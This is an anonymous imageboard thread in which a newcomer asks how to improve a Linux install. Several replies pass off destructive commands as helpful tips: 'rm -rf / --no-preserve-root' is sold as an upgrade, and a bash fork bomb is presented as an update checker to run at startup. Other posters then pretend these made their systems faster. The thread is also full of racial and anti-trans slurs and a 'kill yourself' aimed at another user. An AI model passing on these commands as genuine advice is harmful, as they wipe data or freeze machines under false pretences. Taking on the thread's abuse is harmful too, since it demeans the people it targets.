Anyone else new to linux here? What shit should I add to soup my new OS up?
Anyone else new to linux here? What shit should I add to soup my new OS up?
Other urls found in this thread:
idk i only use linux to watch movies and surf the web
easiest way to upgrade a linux machine: "sudo rm -rf / –no-preserve-root"
It totally roots out and replaces any outdated or slow files
t.friendly neighborhood computer technician
sudo aptitude-get purge ubuntu-desktop
Install Windows
Install Gentoo
Install Wintoo or Gendows.
I ran "sudo rm -rf/ –no-preserve-root" and it said invalid option
There's a space: "sudo rm -rf / –no-preserve-root"
Yeah it's replacing a whole bunch of stuff
Holy shit, that was a brand new install and EVEN THEN this thing is a whole lot faster. Even that stupid Amazon application is gone
Use ubuntu + mate. It has all of the advantages of ubuntu, minus the autistic UX.
GNOME is better, tbh
What are you doing nigger.
by autistic Holla Forums board volunteers, maybe
top kek
looks like it's working
Alright, it's restarting, let's see if it's faster
Just confirmed, yeah it's heaps faster now
echo "tree / | grep nigger > yourniggers.txt" > && chmod +x && ./
this finds all the files on all your drives with the word "nigger" in it and makes a text file of each instance of the word nigger btw
Isn't asking another noob for advice just the blind leading the blind?
Should have asked for someone old to Linux.
took about 5 minutes. post your niggers
obvious OSX ripoff
shut the fuck up nicole, kill yourself tranny
Anybody else got any cool linux tricks or opinions?
Make a live cd or install it to your HD.
Yes ":(){ :|:& };:" makes sure that your OS is up to date and if not it will install the required options, the formatting looks quite odd but it explains why it has to look like that in the ubuntu documentation, can't really remember why atm.
If you want you can even but this in a bash script file ".sh" and make it run everytime you start your computer to check for updates, highly recommend.
meant packages sorry
Isn't that less open-source, more proprietary and really specialized for certain activities, like pen-testing, that I do not engage in?
Currently using TAILS myself.
t. pedo
Nah. Cryptocurrency trader and peruser of sites like this at times.
pls teech me <
Temple OS
based Terry A. Davis
Nigger Please! I taught myself; and it's taken me years to get where I am now. There is so much more to learn every day too. The space is on fire right now. You had better get started now or you will get left behind.
Blockchain technologies are changing the world.
this openbazaar 2 was released and wer will probably start seeing vendor shops in the near future
Got the .onion link?
onion link for what?
I'm not really new to Linux, been using it for years. I like openbox and WM, check em out if your building your distro or if your all ready using one you can still install them and check em out.
Windows? Windows? Fuck windows you nigger botch fuck tard. I stopped using Windows when xp was lost. Fuck Windows fuck you and fuck the horse you rode in on.
retard got baited
Not really, a lot of fuck tards think Windows is so cool and is the best so really it's better to let it be known than not to say anything at all when a lot of people would believe him… So it's more like shity bait that has no point if it was bait of some sort…
And you call me retard for saying facts…name calling is a sign of aggression and signs of a low IQ due to the lack of ability to express ones thoughts in actual statements rather than aggressive interactions
You're absolutely right speaking about your facts, I myself despise windows and is currently using gnu/linux but the bait seemed quite obvious to me in this situation.
No, I genuinely use Windows. I heard tinuxoids eat toe nails
Linux has no software
Linux doesn't even exist
Please don't try to make your self sound smart by saying gnu/Linux. No one just uses Linux all by it self so when someone says they use Linux there is prolly 98% chance they use gnu…
I'm not trying to sound smart when i say "gnu/linux" just mentioned it so gnu faggots wouldn't scream at me.
And obviously no one is using linux by itself it's a fucking kernel.
Glad to hear you know stuff like this👊
I guess i'm a little bit tech savvy
Is installing a tile manager less resource intensive?
long ass command line you'll hardly remember
shitty results
Used pic related.